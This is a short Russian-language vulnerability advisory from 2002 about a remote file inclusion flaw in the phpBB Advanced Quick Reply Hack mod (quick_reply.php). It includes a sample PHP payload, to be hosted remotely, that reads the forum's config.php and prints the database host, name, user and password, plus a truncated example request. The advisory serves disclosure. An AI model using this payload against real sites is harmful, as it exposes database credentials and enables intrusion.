Дата публикации: | 18.11.2002 |
Всего просмотров: | 2035 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость, обнаруженная в phpBB Advanced Quick Reply Hack, позволяет удаленному атакующему внедрить путь к 'extension.inc' в сценарии 'quick_reply.php'. В результате, атакующий может внедрить произвольный PHP сценарий из своего источника, который может использоваться для выполнения произвольных команд на Web сервере. Пример: Создаем сценарий 'extension.inc' на удаленном сервере: <?php include('config'.'.php'); echo "DB Type: $dbms <br>"; echo "DB Host: $dbhost <br>"; echo "DB Name: $dbname <br>"; echo "DB User: $dbuser <br>"; echo "DB Pass: $dbpasswd <br>"; exit; ?>Затем запрос:
http://www.example.com/quick_reply.php? Раскроет содержание базы данных форума. Уязвимость обнаружена в RustyDragon phpBB Advanced Quick Reply Hack 1.0-1.1 (phpBB 2.0-2.0.3) |
Ссылки: | Code Injection in phpBB Advanced Quick Reply Mod |